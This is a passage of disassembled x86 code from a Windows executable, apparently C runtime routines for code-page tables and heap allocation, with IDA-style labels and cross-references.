; ---------------------------------------------------------------------------
loc_403B4B: ; CODE XREF: sub_403B2A+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_403B51: ; CODE XREF: sub_403B2A+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_403B57: ; CODE XREF: sub_403B2A+9�j
mov eax, 411h
retn
sub_403B2A endp
; =============== S U B R O U T I N E =======================================
sub_403B5D proc near ; CODE XREF: sub_403947:loc_403ACA�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_407240
rep stosd
stosb
xor eax, eax
mov edi, offset dword_407120
mov dword_407110, eax
mov dword_40712C, eax
mov dword_407344, eax
stosd
stosd
stosd
pop edi
retn
sub_403B5D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B86 proc near ; CODE XREF: sub_403947:loc_403ACF�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push dword_407110
call dword_40506C ; GetCPInfo
cmp eax, 1
jnz loc_403CBF
xor eax, eax
mov esi, 100h
loc_403BB0: ; CODE XREF: sub_403B86+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_403BB0
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_403C01
push ebx
push edi
lea edx, [ebp+var_D]
loc_403BCF: ; CODE XREF: sub_403B86+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_403BF6
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_403BF6: ; CODE XREF: sub_403B86+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_403BCF
pop edi
pop ebx
loc_403C01: ; CODE XREF: sub_403B86+42�j
push 0
lea eax, [ebp+var_514]
push dword_407344
push dword_407110
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_4037BC
push 0
lea eax, [ebp+var_214]
push dword_407110
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push dword_407344
call sub_40479E
push 0
lea eax, [ebp+var_314]
push dword_407110
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push dword_407344
call sub_40479E
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_403C7C: ; CODE XREF: sub_403B86+135�j
mov dx, [ecx]
test dl, 1
jz short loc_403C9A
or byte_407241[eax], 10h
mov dl, [ebp+eax+var_214]
loc_403C92: ; CODE XREF: sub_403B86+127�j
mov byte_407140[eax], dl
jmp short loc_403CB6
; ---------------------------------------------------------------------------
loc_403C9A: ; CODE XREF: sub_403B86+FC�j
test dl, 2
jz short loc_403CAF
or byte_407241[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_403C92
; ---------------------------------------------------------------------------
loc_403CAF: ; CODE XREF: sub_403B86+117�j
and byte_407140[eax], 0
loc_403CB6: ; CODE XREF: sub_403B86+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_403C7C
jmp short loc_403D08
; ---------------------------------------------------------------------------
loc_403CBF: ; CODE XREF: sub_403B86+1D�j
xor eax, eax
mov esi, 100h
loc_403CC6: ; CODE XREF: sub_403B86+180�j
cmp eax, 41h
jb short loc_403CE4
cmp eax, 5Ah
ja short loc_403CE4
or byte_407241[eax], 10h
mov cl, al
add cl, 20h
loc_403CDC: ; CODE XREF: sub_403B86+174�j
mov byte_407140[eax], cl
jmp short loc_403D03
; ---------------------------------------------------------------------------
loc_403CE4: ; CODE XREF: sub_403B86+143�j
; sub_403B86+148�j
cmp eax, 61h
jb short loc_403CFC
cmp eax, 7Ah
ja short loc_403CFC
or byte_407241[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_403CDC
; ---------------------------------------------------------------------------
loc_403CFC: ; CODE XREF: sub_403B86+161�j
; sub_403B86+166�j
and byte_407140[eax], 0
loc_403D03: ; CODE XREF: sub_403B86+15C�j
inc eax
cmp eax, esi
jb short loc_403CC6
loc_403D08: ; CODE XREF: sub_403B86+137�j
pop esi
leave
retn
sub_403B86 endp
; =============== S U B R O U T I N E =======================================
sub_403D0B proc near ; CODE XREF: sub_402DE7+9�p
; sub_402E3F+D�p ...
cmp dword_407468, 0
jnz short locret_403D26
push 0FFFFFFFDh
call sub_403947
pop ecx
mov dword_407468, 1
locret_403D26: ; CODE XREF: sub_403D0B+7�j
retn
sub_403D0B endp
; =============== S U B R O U T I N E =======================================
sub_403D27 proc near ; CODE XREF: sub_402E3F+9D�p
; sub_403145+BF�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_403D54
push esi
call sub_403E08
pop ecx
test eax, eax
push esi
jz short loc_403D46
push eax
call sub_403E33
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_403D46: ; CODE XREF: sub_403D27+13�j
push 0
push dword_407348
call dword_405084 ; RtlFreeHeap
loc_403D54: ; CODE XREF: sub_403D27+7�j
pop esi
retn
sub_403D27 endp
; =============== S U B R O U T I N E =======================================
sub_403D56 proc near ; CODE XREF: sub_402E3F+3A�p
; sub_402E3F+6F�p ...
arg_0 = dword ptr 4
push dword_4070F0
push [esp+4+arg_0]
call sub_403D68
pop ecx
pop ecx
retn
sub_403D56 endp
; =============== S U B R O U T I N E =======================================
sub_403D68 proc near ; CODE XREF: sub_403D56+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_403D91
loc_403D6F: ; CODE XREF: sub_403D68+27�j
push [esp+arg_0]
call sub_403D94
test eax, eax
pop ecx
jnz short locret_403D93
cmp [esp+arg_4], eax
jz short locret_403D93
push [esp+arg_0]
call sub_4049ED
test eax, eax
pop ecx
jnz short loc_403D6F
loc_403D91: ; CODE XREF: sub_403D68+5�j
xor eax, eax
locret_403D93: ; CODE XREF: sub_403D68+13�j
; sub_403D68+19�j
retn
sub_403D68 endp
; =============== S U B R O U T I N E =======================================
sub_403D94 proc near ; CODE XREF: sub_403D68+B�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_406F38
ja short loc_403DAC
push esi
call sub_40415E
test eax, eax
pop ecx
jnz short loc_403DC8
loc_403DAC: ; CODE XREF: sub_403D94+B�j
test esi, esi
jnz short loc_403DB3
push 1
pop esi
loc_403DB3: ; CODE XREF: sub_403D94+1A�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push dword_407348
call dword_405060 ; RtlAllocateHeap
loc_403DC8: ; CODE XREF: sub_403D94+16�j
pop esi
retn
sub_403D94 endp
; =============== S U B R O U T I N E =======================================
sub_403DCA proc near ; CODE XREF: sub_403422+20�p
push 140h
push 0
push dword_407348
call dword_405060 ; RtlAllocateHeap
test eax, eax
mov dword_40710C, eax
jnz short loc_403DE7
retn
; ---------------------------------------------------------------------------
loc_403DE7: ; CODE XREF: sub_403DCA+1A�j
and dword_407104, 0
and dword_407108, 0
push 1
mov dword_407100, eax
mov dword_4070F8, 10h
pop eax
retn
sub_403DCA endp
; =============== S U B R O U T I N E =======================================
sub_403E08 proc near ; CODE XREF: sub_403D27+A�p
arg_0 = dword ptr 4
mov eax, dword_407108
lea ecx, [eax+eax*4]
mov eax, dword_40710C
lea ecx, [eax+ecx*4]
loc_403E18: ; CODE XREF: sub_403E08+26�j
cmp eax, ecx
jnb short loc_403E30
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_403E32
add eax, 14h
jmp short loc_403E18
; ---------------------------------------------------------------------------
loc_403E30: ; CODE XREF: sub_403E08+12�j
xor eax, eax
locret_403E32: ; CODE XREF: sub_403E08+21�j
retn
sub_403E08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403E33 proc near ; CODE XREF: sub_403D27+16�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov eax, [ecx+10h]
mov esi, edx
sub esi, [ecx+0Ch]
mov ebx, [edx-4]
add edx, 0FFFFFFFCh
push edi
shr esi, 0Fh
mov ecx, esi
mov edi, [edx-4]
imul ecx, 204h
dec ebx
mov [ebp+var_4], edi
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ebx
mov [ebp+var_10], ecx
mov ecx, [ebx+edx]
test cl, 1
mov [ebp+var_8], ecx
jnz short loc_403EF9
sar ecx, 4
push 3Fh
dec ecx
pop edi
mov [ebp+arg_4], ecx
cmp ecx, edi
jbe short loc_403E8B
mov [ebp+arg_4], edi
loc_403E8B: ; CODE XREF: sub_403E33+53�j
mov ecx, [ebx+edx+4]
cmp ecx, [ebx+edx+8]
jnz short loc_403EDD
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403EB9
mov edi, 80000000h
shr edi, cl
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+44h], edi
dec byte ptr [ecx]
jnz short loc_403EDD
mov ecx, [ebp+arg_0]
and [ecx], edi
jmp short loc_403EDD
; ---------------------------------------------------------------------------
loc_403EB9: ; CODE XREF: sub_403E33+68�j
add ecx, 0FFFFFFE0h
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+0C4h], edi
dec byte ptr [ecx]
jnz short loc_403EDD
mov ecx, [ebp+arg_0]
and [ecx+4], edi
loc_403EDD: ; CODE XREF: sub_403E33+60�j
; sub_403E33+7D�j ...
mov ecx, [ebx+edx+8]
mov edi, [ebx+edx+4]
mov [ecx+4], edi
mov ecx, [ebx+edx+4]
mov edi, [ebx+edx+8]
add ebx, [ebp+var_8]
mov [ecx+8], edi
mov [ebp+var_C], ebx
loc_403EF9: ; CODE XREF: sub_403E33+45�j
mov edi, ebx
sar edi, 4
dec edi
cmp edi, 3Fh
jbe short loc_403F07
push 3Fh
pop edi
loc_403F07: ; CODE XREF: sub_403E33+CF�j
mov ecx, [ebp+var_4]
and ecx, 1
mov [ebp+var_14], ecx
jnz loc_403FB6
sub edx, [ebp+var_4]
mov ecx, [ebp+var_4]
sar ecx, 4
push 3Fh
mov [ebp+var_8], edx
dec ecx
pop edx
cmp ecx, edx
mov [ebp+arg_4], ecx
jbe short loc_403F32
mov [ebp+arg_4], edx
mov ecx, edx
loc_403F32: ; CODE XREF: sub_403E33+F8�j
add ebx, [ebp+var_4]
mov edi, ebx
mov [ebp+var_C], ebx
sar edi, 4
dec edi
cmp edi, edx
jbe short loc_403F44
mov edi, edx
loc_403F44: ; CODE XREF: sub_403E33+10D�j
cmp ecx, edi
jz short loc_403FB3
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
cmp edx, [ecx+8]
jnz short loc_403F9B
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403F77
mov edx, 80000000h
shr edx, cl
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+44h], edx
dec byte ptr [ecx]
jnz short loc_403F9B
mov ecx, [ebp+arg_0]
and [ecx], edx
jmp short loc_403F9B
; ---------------------------------------------------------------------------
loc_403F77: ; CODE XREF: sub_403E33+126�j
add ecx, 0FFFFFFE0h
mov edx, 80000000h
shr edx, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+0C4h], edx
dec byte ptr [ecx]
jnz short loc_403F9B
mov ecx, [ebp+arg_0]
and [ecx+4], edx
loc_403F9B: ; CODE XREF: sub_403E33+11E�j
; sub_403E33+13B�j ...
mov ecx, [ebp+var_8]
mov edx, [ecx+8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov [edx+8], ecx
loc_403FB3: ; CODE XREF: sub_403E33+113�j
mov edx, [ebp+var_8]
loc_403FB6: ; CODE XREF: sub_403E33+DD�j
cmp [ebp+var_14], 0
jnz short loc_403FC5
cmp [ebp+arg_4], edi
jz loc_40404E
loc_403FC5: ; CODE XREF: sub_403E33+187�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_40404E
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_404022
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_404011
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_404011: ; CODE XREF: sub_403E33+1CE�j
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
lea eax, [eax+esi*4+44h]
or [eax], ebx
jmp short loc_40404B
; ---------------------------------------------------------------------------
loc_404022: ; CODE XREF: sub_403E33+1C8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_404038
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_404038: ; CODE XREF: sub_403E33+1F3�j
lea ecx, [edi-20h]
mov edi, 80000000h
shr edi, cl
lea eax, [eax+esi*4+0C4h]
or [eax], edi
loc_40404B: ; CODE XREF: sub_403E33+1ED�j
mov ebx, [ebp+var_C]
loc_40404E: ; CODE XREF: sub_403E33+18C�j
; sub_403E33+1B6�j
mov eax, [ebp+var_10]
mov [edx], ebx
mov [ebx+edx-4], ebx
dec dword ptr [eax]
jnz loc_404159
mov eax, dword_407104
test eax, eax
jz loc_40414B
mov ecx, dword_4070FC
mov edi, dword_405088
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call edi ; VirtualFree
mov ecx, dword_4070FC
mov eax, dword_407104
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_407104
mov ecx, dword_4070FC
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_407104
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_407104
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_4040D9
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_407104
loc_4040D9: ; CODE XREF: sub_403E33+29B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_40414B
push ebx
push 0
push dword ptr [eax+0Ch]
call edi ; VirtualFree
mov eax, dword_407104
push dword ptr [eax+10h]
push 0
push dword_407348
call dword_405084 ; RtlFreeHeap
mov eax, dword_407108
mov edx, dword_40710C
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_407104
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_404A10
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_407108
cmp eax, dword_407104
jbe short loc_40413D
sub eax, 14h
loc_40413D: ; CODE XREF: sub_403E33+305�j
mov ecx, dword_40710C
mov dword_407100, ecx
jmp short loc_40414E
; ---------------------------------------------------------------------------
loc_40414B: ; CODE XREF: sub_403E33+233�j
; sub_403E33+2AA�j
mov eax, [ebp+arg_0]
loc_40414E: ; CODE XREF: sub_403E33+316�j
mov dword_407104, eax
mov dword_4070FC, esi
loc_404159: ; CODE XREF: sub_403E33+226�j
pop edi
pop esi
pop ebx
leave
retn
sub_403E33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40415E proc near ; CODE XREF: sub_403D94+E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_407108
mov edx, dword_40710C
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_40419E
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_4041AE
; ---------------------------------------------------------------------------
loc_40419E: ; CODE XREF: sub_40415E+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_4041AE: ; CODE XREF: sub_40415E+3E�j
mov eax, dword_407100
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_4041D5
loc_4041BC: ; CODE XREF: sub_40415E+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_4041D5
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_4041BC
loc_4041D5: ; CODE XREF: sub_40415E+5C�j
; sub_40415E+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_404253
mov ebx, edx
loc_4041DC: ; CODE XREF: sub_40415E+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_4041F8
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_4041F6
add ebx, 14h
jmp short loc_4041DC
; ---------------------------------------------------------------------------
loc_4041F6: ; CODE XREF: sub_40415E+91�j
cmp ebx, eax
loc_4041F8: ; CODE XREF: sub_40415E+83�j
jnz short loc_404253
loc_4041FA: ; CODE XREF: sub_40415E+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_404210
cmp dword ptr [ebx+8], 0
jnz short loc_40420D
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_4041FA
; ---------------------------------------------------------------------------
loc_40420D: ; CODE XREF: sub_40415E+A5�j
cmp ebx, [ebp+var_4]
loc_404210: ; CODE XREF: sub_40415E+9F�j
jnz short loc_404238
mov ebx, edx
loc_404214: ; CODE XREF: sub_40415E+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_404228
cmp dword ptr [ebx+8], 0
jnz short loc_404226
add ebx, 14h
jmp short loc_404214
; ---------------------------------------------------------------------------
loc_404226: ; CODE XREF: sub_40415E+C1�j
cmp ebx, eax
loc_404228: ; CODE XREF: sub_40415E+BB�j
jnz short loc_404238
call sub_404467
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_40424C
loc_404238: ; CODE XREF: sub_40415E:loc_404210�j
; sub_40415E:loc_404228�j
push ebx
call sub_404518
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_404253
loc_40424C: ; CODE XREF: sub_40415E+D8�j
xor eax, eax
jmp loc_404462
; ---------------------------------------------------------------------------
loc_404253: ; CODE XREF: sub_40415E+7A�j
; sub_40415E:loc_4041F8�j ...
mov dword_407100, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_40427A
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_4042B1
loc_40427A: ; CODE XREF: sub_40415E+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_4042AE
loc_404297: ; CODE XREF: sub_40415E+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_404297
loc_4042AE: ; CODE XREF: sub_40415E+137�j
mov edx, [ebp+var_4]
loc_4042B1: ; CODE XREF: sub_40415E+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_4042DA
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_4042DA: ; CODE XREF: sub_40415E+16D�j
; sub_40415E+183�j
test ecx, ecx
jl short loc_4042E3
shl ecx, 1
inc edi
jmp short loc_4042DA
; ---------------------------------------------------------------------------
loc_4042E3: ; CODE XREF: sub_40415E+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_404300
push 3Fh
pop esi
loc_404300: ; CODE XREF: sub_40415E+19D�j
cmp esi, edi
jz loc_404415
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_404371
cmp edi, 20h
jge short loc_404340
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_40436E
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_404371
; ---------------------------------------------------------------------------
loc_404340: ; CODE XREF: sub_40415E+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_40436E
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_404371
; ---------------------------------------------------------------------------
loc_40436E: ; CODE XREF: sub_40415E+1D6�j
; sub_40415E+203�j
mov ebx, [ebp+arg_0]
loc_404371: ; CODE XREF: sub_40415E+1B0�j
; sub_40415E+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_404421
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_404412
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_4043E3
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_4043D1
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_4043D1: ; CODE XREF: sub_40415E+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_404412
; ---------------------------------------------------------------------------
loc_4043E3: ; CODE XREF: sub_40415E+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_4043FC
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_4043FC: ; CODE XREF: sub_40415E+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_404412: ; CODE XREF: sub_40415E+24E�j
; sub_40415E+283�j
mov ecx, [ebp+var_8]
loc_404415: ; CODE XREF: sub_40415E+1A4�j
test ecx, ecx
jz short loc_404424
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_404424
; ---------------------------------------------------------------------------
loc_404421: ; CODE XREF: sub_40415E+229�j
mov ecx, [ebp+var_8]
loc_404424: ; CODE XREF: sub_40415E+2B9�j
; sub_40415E+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_40445A
cmp ebx, dword_407104
jnz short loc_40445A
mov ecx, [ebp+var_4]
cmp ecx, dword_4070FC
jnz short loc_40445A
and dword_407104, 0
loc_40445A: ; CODE XREF: sub_40415E+2E0�j
; sub_40415E+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_404462: ; CODE XREF: sub_40415E+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_40415E endp
; =============== S U B R O U T I N E =======================================
sub_404467 proc near ; CODE XREF: sub_40415E+CC�p
mov eax, dword_407108
mov ecx, dword_4070F8
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_4044AA
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_40710C
push edi
push dword_407348
call dword_405058 ; RtlReAllocateHeap
cmp eax, edi
jz short loc_4044FA
add dword_4070F8, 10h
mov dword_40710C, eax
mov eax, dword_407108
loc_4044AA: ; CODE XREF: sub_404467+11�j
mov ecx, dword_40710C
push 41C4h
push 8
lea eax, [eax+eax*4]
push dword_407348
lea esi, [ecx+eax*4]
call dword_405060 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_4044FA
push 4
push 2000h
push 100000h
push edi
call dword_40505C ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_4044FE
push dword ptr [esi+10h]
push edi
push dword_407348
call dword_405084 ; RtlFreeHeap
loc_4044FA: ; CODE XREF: sub_404467+30�j
; sub_404467+67�j
xor eax, eax
jmp short loc_404515
; ---------------------------------------------------------------------------
loc_4044FE: ; CODE XREF: sub_404467+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_407108
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_404515: ; CODE XREF: sub_404467+95�j
pop edi
pop esi
retn
sub_404467 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404518 proc near ; CODE XREF: sub_40415E+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_40452A: ; CODE XREF: sub_404518+19�j
test eax, eax
jl short loc_404533
shl eax, 1
inc ebx
jmp short loc_40452A
; ---------------------------------------------------------------------------
loc_404533: ; CODE XREF: sub_404518+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_404548: ; CODE XREF: sub_404518+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_404548
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call dword_40505C ; VirtualAlloc
test eax, eax
jnz short loc_40457B
or eax, 0FFFFFFFFh
jmp loc_40460E
; ---------------------------------------------------------------------------
loc_40457B: ; CODE XREF: sub_404518+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_4045C1
lea eax, [edi+10h]
loc_404588: ; CODE XREF: sub_404518+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_404588
loc_4045C1: ; CODE XREF: sub_404518+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_4045FE
or [eax+4], edi
loc_4045FE: ; CODE XREF: sub_404518+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_40460E: ; CODE XREF: sub_404518+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_404518 endp
; =============== S U B R O U T I N E =======================================
sub_404613 proc near ; CODE XREF: sub_403669+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp dword_4070C0, ebx
push esi
push edi
jnz short loc_404662
push offset aUser32_dll ; "user32.dll"
call dword_405014 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_404698
